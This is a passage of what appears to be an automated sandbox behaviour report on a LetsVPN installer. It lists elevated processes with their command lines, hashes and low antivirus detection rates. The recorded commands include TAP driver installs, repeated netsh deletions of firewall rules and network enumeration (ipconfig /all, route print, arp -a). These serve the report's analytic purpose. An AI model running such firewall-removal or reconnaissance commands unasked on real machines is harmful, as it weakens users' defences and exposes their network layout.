                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
                                                                                                                                                                                                  Imagebase:0x7ff796190000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                  Start time:10:15:07
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                  Start time:10:15:07
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver"
                                                                                                                                                                                                  Imagebase:0x7ff63a620000
                                                                                                                                                                                                  File size:337'920 bytes
                                                                                                                                                                                                  MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                  Start time:10:15:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160"
                                                                                                                                                                                                  Imagebase:0x7ff63a620000
                                                                                                                                                                                                  File size:337'920 bytes
                                                                                                                                                                                                  MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                  Start time:10:15:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                  Start time:10:15:10
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff796190000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=lets
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets.exe
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=lets.exe
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsPRO.exe
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6ae840000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                  Start time:10:15:13
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsPRO
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                  Start time:10:15:13
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                  Start time:10:15:13
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                  Start time:10:15:13
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsVPN
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                  Start time:10:15:14
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
                                                                                                                                                                                                  Imagebase:0x680000
                                                                                                                                                                                                  File size:247'840 bytes
                                                                                                                                                                                                  MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                  Start time:10:15:14
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
                                                                                                                                                                                                  Imagebase:0x710000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                  Start time:10:15:22
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:247'840 bytes
                                                                                                                                                                                                  MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                  Start time:10:15:22
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x90000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                  Start time:10:15:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                  Start time:10:15:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                  Start time:10:15:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Imagebase:0x3b0000
                                                                                                                                                                                                  File size:209'920 bytes
                                                                                                                                                                                                  MD5 hash:9A48D32D7DBA794A40BF030DA500603B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                  Start time:10:15:28
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C ipconfig /all
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                  Start time:10:15:28
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xd40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C route print
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                  Imagebase:0x630000
                                                                                                                                                                                                  File size:19'456 bytes
                                                                                                                                                                                                  MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                  Start time:10:15:30
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C arp -a
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
